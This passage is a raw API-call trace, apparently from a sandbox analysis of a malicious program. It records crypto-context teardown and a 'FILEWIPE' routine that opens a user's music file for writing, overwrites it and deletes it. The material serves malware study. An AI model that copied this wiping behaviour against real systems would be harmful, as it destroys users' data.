hHeap=0x770000) returned 1 [0039.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0039.035] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.035] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.035] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0039.035] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0039.036] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.036] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.036] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.036] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.036] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0039.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.036] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.036] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.036] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.036] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0039.036] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0039.036] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0039.036] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.037] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0039.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0039.037] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.037] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.037] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0039.037] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.037] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.037] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.037] FreeLibrary (hLibModule=0x754b0000) returned 1 [0039.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0039.037] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0039.037] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.037] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.038] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.039] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.039] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.039] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0039.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0039.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.039] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.039] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.039] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcff3990, ftCreationTime.dwHighDateTime=0x1d5b921, ftLastAccessTime.dwLowDateTime=0x3058f6a0, ftLastAccessTime.dwHighDateTime=0x1d5c0e8, ftLastWriteTime.dwLowDateTime=0x3058f6a0, ftLastWriteTime.dwHighDateTime=0x1d5c0e8, nFileSizeHigh=0x0, nFileSizeLow=0x3c1a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="GR_-.m4a", cAlternateFileName="")) returned 0x7c2240 [0039.039] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0039.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.039] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.039] CharLowerBuffW (in: lpsz="byte[15386]", cchLength=0xb | out: lpsz="byte[15386]") returned 0xb [0039.040] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.040] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0039.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0039.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.040] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.040] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0039.040] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0039.040] FreeLibrary (hLibModule=0x76b40000) returned 1 [0039.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0039.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0039.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0039.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0039.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0039.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0039.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0039.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0039.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0039.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0039.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0039.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0039.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0039.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.041] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.041] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.041] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.041] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0039.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0039.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.041] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.041] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.041] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.041] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.041] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.041] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.041] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.041] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.042] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.042] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.042] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0039.042] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.042] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.042] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.042] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.042] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.042] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0039.042] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.042] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\gr_-.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0039.042] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0039.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0039.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0039.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0039.043] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.043] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.043] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.043] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0039.043] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.043] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.043] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.043] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.043] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.043] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.044] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.044] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.044] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0039.044] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.044] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.044] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.044] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.044] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.044] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.044] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.044] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a", lpFilePart=0x0) returned 0x3e [0039.044] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcff3990, ftCreationTime.dwHighDateTime=0x1d5b921, ftLastAccessTime.dwLowDateTime=0x3058f6a0, ftLastAccessTime.dwHighDateTime=0x1d5c0e8, ftLastWriteTime.dwLowDateTime=0x16fb1620, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x3c1a, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="GR_-.m4a", cAlternateFileName="")) returned 0x7c2240 [0039.044] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\gr_-.m4a")) returned 1 [0039.045] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcff3990, ftCreationTime.dwHighDateTime=0x1d5b921, ftLastAccessTime.dwLowDateTime=0x3058f6a0, ftLastAccessTime.dwHighDateTime=0x1d5c0e8, ftLastWriteTime.dwLowDateTime=0x16fb1620, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x3c1a, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="GR_-.m4a", cAlternateFileName="")) returned 0 [0039.045] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.045] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.045] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0039.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0039.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0039.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0039.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 